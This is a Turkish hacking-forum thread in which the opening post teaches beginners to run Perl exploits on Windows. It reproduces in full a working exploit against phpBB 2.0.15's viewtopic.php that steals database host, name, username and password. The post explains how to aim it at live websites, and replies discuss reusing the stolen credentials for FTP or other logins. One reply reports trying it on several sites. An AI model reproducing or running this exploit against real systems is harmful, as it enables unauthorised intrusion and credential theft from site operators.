Perl"De Exploit Derlemek...

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek

    Perl ile Exploit derleme...


    Öncelikle Perl'de exploit derlemek için ActivePerli indirin: http://aspn.activestate.com/ASPN/Downloads/ActivePerl/
    Kurulum bittiği zaman C:\Perl diye bir dizin çıkacak. Şimdi örnek bir exploitle, exploit derlemeyi anlatacağım..


    Öncelikle Exploiti txt dosyasına kaydedip farklı kaydetten Perl\bin klasörüne .pl uzantılı olarak koymamız lazım.
    .pl uzantı otomatikman Perl dosyasına dönüşmeli, Eğer Text olarak kalıyorsa(perl dosyasıda txt gibi gözukur anlamak için dosyaya sağ tıklayıp özellikler diyin dosya türü yazacaktır. dosya türü: Perl yazması gerekmektedir), Belgelerim üzerindeki Araçlar sekmesinden
    Klasör Seçenekleri/Görünüm/Dosyaların gerçek uzantılarını gizle sekmesindeki ticki kaldırın:




    *Exploitimizin adı exploitin kodlarında gizlidir. Yanlış adla kaydedersek çalışmaz. Normalde bir exploitin adını öğrenmek için ctrl+a ya basın arama seçeneği çıkacaktır .pl yi aratın, adını göreceksiniz. Mesela aşşağıdaki Exploitin adı phpbbSecureD.pl
    bu şekilde kaydedin:


    #!/usr/bin/perl


    # **************************************************************
    #**
    #** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
    #** This exploit gives the user all the details about the database
    #** connection such as database host, username, password and
    #** database name.
    #**
    #** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
    #**
    #** Greetings to GvR, Jumento, PP, CKrew & friends
    #**
    # **************************************************************


    use IO::Socket;


    print "+-----------------------------------------------------------------------+\r\n";
    print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
    print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
    print "+-----------------------------------------------------------------------+\r\n";


    if (@ARGV < 3)
    {
    print "Usage:\r\n";
    print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
    print "SERVER - Server where PhpBB is installed.\r\n";
    print "DIR - PHPBB directory or / for no directory.\r\n";
    print "THREADID - Id of an existing thread.\r\n";
    print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
    print " Use this when a thread needs authentication for viewing\r\n";
    print " You can use Firefox in combination with \"Live HTTP\r\n";
    print " Headers\" to get this cookiestring.\r\n\r\n";
    print "Example 1 (with cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
    phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
    autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
    userid%22%3Bs%3A1%3A%222%22%3B%7D;
    phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
    print "Example 2 (without cookiestring):\r\n";
    print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
    exit();
    }


    $serv = $ARGV[0];
    $dir = $ARGV[1];
    $threadid = $ARGV[2];
    $cookie = $ARGV[3];


    $serv =~ s/http:\/\///ge;
    $delimit = "GvRSecureD";


    $sploit = $dir . "viewtopic.php?t=";
    $sploit .= $threadid;
    $sploit .= "&highlight='.printf($delimit.";
    $sploit .= "\$dbhost.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbname.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbuser.";
    $sploit .= "$delimit.";
    $sploit .= "\$dbpasswd.";
    $sploit .= "$delimit).'";


    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
    or die "[+] Connecting ... Could not connect to host.\n\n";


    print "[+] Connecting OK\n";
    sleep(1);


    print "[+] Sending exploit ";
    print $sock "GET $sploit HTTP/1.1\r\n";
    print $sock "Host: $serv\r\n";
    if ( defined $cookie) {
    print $sock "Cookie: $cookie \r\n";
    }
    print $sock "Connection: close\r\n\r\n";



    $succes = 0;


    while ($answer = <$sock>) {
    $delimitIndex = index $answer, $delimit;
    if ($delimitIndex >= 0) {
    $succes = 1;
    $urlIndex = index $answer, "href";
    if ($urlIndex < 0){
    $answer = substr($answer, length($delimit));
    $length = 0;
    while (length($answer) > 0) {
    $nex = index($answer, $delimit);
    if ($nex > 0) {
    push(@array, substr($answer, 0, $nex));
    $answer = substr($answer, $nex + length($delimit), length($answer));
    } else {
    $answer= "";
    }
    }
    }
    }
    }


    close($sock);


    if ($succes == 1) {
    print "OK\n";
    sleep(1);
    print "[+] Database Host: " . $array[0] . "\n";
    sleep(1);
    print "[+] Database Name: " . $array[1] . "\n";
    sleep(1);
    print "[+] Username: " . $array[2] . "\n";
    sleep(1);
    print "[+] Password: " . $array[3] . "\n";
    sleep(1);
    } else {
    print "FAILED\n";
    }


    Gelelim bu exploiti derlemeye başlat/çalıştır/cmd yazıyoruz siyah bir ekran çıkıyor. Şimdi bizim exploitimiz,
    C:\Perl\bin dizininde ama sizin cmd deki komut dizini C:\Documenfalanfilan\useradi şeklinde. Biz Perl\bin dizinine
    ulaşmak için "cd.." yazıyoruz ve C:\Documentfalanfilan kalıyor bir daha "cd.." yazıyoruz. C:\ dizini kalıyor.


    Şimdi "cd Perl" yazıyoruz C:\Perl dizinine ulaşıyor ama biz bin e ulaşacağız bunun için cd bin yazıyoruz. Evet şimdi
    Exploitle aynı dizindeyiz buraya daha önceden text dosyasından farklı kaydet diyerek phpbbSecureD.pl olarak kaydedittiğimiz exploiti
    derlemek için Perl phpbbSecureD.pl yazıyoruz, bu sayede nasıl kullanılacağını öğreniriz(diğer exploitlerdede böyle) Ama bu exploitin kullanımı
    şu şekildedir: Perl phpbbSecureD.pl site ipsi /forumyolu/ 20



    *Site ipsini bulmak için başlat/çalıştır/cmd ping www.siteadi.com


    *örneğin phpbb yolu, www.siteadi.com/forum da ise /forumyolu/ yerine /forum/ yazıyoruz.


    *Unutmayın bu exploit sadece phpbb 2.0.15 lerde açık kapatılmamısşa çalışır..


    Örnek uygulama:



    ---------------------------------------------------------------------------------------------------------


    Bu dökümanın yeterince açık olduğuna inanıyorum sorularınız sorabilirsiniz. Seer arkadaşıma bana bu işi çok iyi anlattığı için teşekkur ederim, Onun anlatımıyla anlatmaya çalıştım. Alıntı değildir, Seer arkadaşım sayesinde benim tarafımdan dökumana dönüştürülmüştür.


    Fistandantilus® -2005


     


    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    truvaa
    truvaa's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    bu expolit bize direk admin sifresini mi veriyor dostum
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    m3rt
    m3rt's avatar
    Kayıt Tarihi: 24/Aralık/2002
    Erkek
    truvaa bunu yazdı:


    bu expolit bize direk admin sifresini mi veriyor dostum


    hyr. database in kullanıcı adı ve şifresini verir. sende db ye bağlanarak herşeyi yapabilirsin
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    XhanDros
    XhanDros's avatar
    Kayıt Tarihi: 17/Temmuz/2005
    Erkek

    m3rt bunu yazdı:



    hyr. database in kullanıcı adı ve şifresini verir. sende db ye bağlanarak herşeyi yapabilirsin



    dışarıdan mySQL'ye nasıl bağlanacaksın ?


    "><i>">sdad
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    truvaa
    truvaa's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek
    XhanDros bunu yazdı:



    m3rt bunu yazdı:



    hyr. database in kullanıcı adı ve şifresini verir. sende db ye bağlanarak herşeyi yapabilirsin




    dışarıdan mySQL'ye nasıl bağlanacaksın ?







     


    database nasıl baglancaz ewer


    bi kac siteye girdimde :) sending  explolit FAİLED dio :) kapatmıslar dımı

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kurdo
    kurdo's avatar
    Kayıt Tarihi: 18/Temmuz/2005
    Erkek

    Yaw bi ara mysql front diye bi pro görmüştüm. sabah eve gidince atarım rapid e...


    Sen sana ayığ ol kendine keke.
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Kayıt Tarihi: 23/Mart/2003
    Erkek

    bununla config.phpnin içeriğine yazılmış kullanıcı acı şifre veritabanı ismini okuyabilirsiniz.


    Yanlız veritabanına dışarıdan bağlanmak için önce host admin panelinden %.%.%.% iplerinin bağlanmasına izin verilmesi gerekmektedir. Onun haricinde server bağlantıyı kabul etmez. Ve genellikle o bağlantı default olarak kapalı geldiğinden(Standartta localhost harici bağlantıya izin verilmez.) bağlanamazsınız...


    O zaman ne işe yarar bu?


    Öyle siteler varki ftp şifresi ile db şifresi aynı oluyor. yada o şifreler başka yerdede kullanılmış oluyor.. Hem bu sadece bir örnek idi :)


    Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek

    Bu sitelerden çeşitli exploitler bulabilirsiniz ama C exploitler bu şekilde derlenmez haberiniz olsun :)


    http://exploitwatch.org/modules/evennews/archives.php


    http://www.securiteam.com/exploits/


    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fuzbing
    fuzbing's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    perlde exploit derlenmez çalıştırılır.Ukalalık olarak alma düzeltmek istedim.

    to be or not to be.
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    MitNickKevin
    MitNickKevin's avatar
    Kayıt Tarihi: 09/Mart/2004
    Erkek
    fuzbing bunu yazdı:


    perlde exploit derlenmez çalıştırılır.Ukalalık olarak alma düzeltmek istedim.


    hadiya!!! çok biliyordun sen yazsaydın dökümanı...

    Bilgi ceza, Bilgi suç ve Taşımak ağır. Unutmak ise öğrenmekten daha çok zaman alır...
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    fuzbing
    fuzbing's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    MitNickKevin bunu yazdı:


    fuzbing bunu yazdı:


    perlde exploit derlenmez çalıştırılır.Ukalalık olarak alma düzeltmek istedim.


    hadiya!!! çok biliyordun sen yazsaydın dökümanı...


    buranın sazanı senmisin.

    to be or not to be.
Toplam Hit: 2602 Toplam Mesaj: 14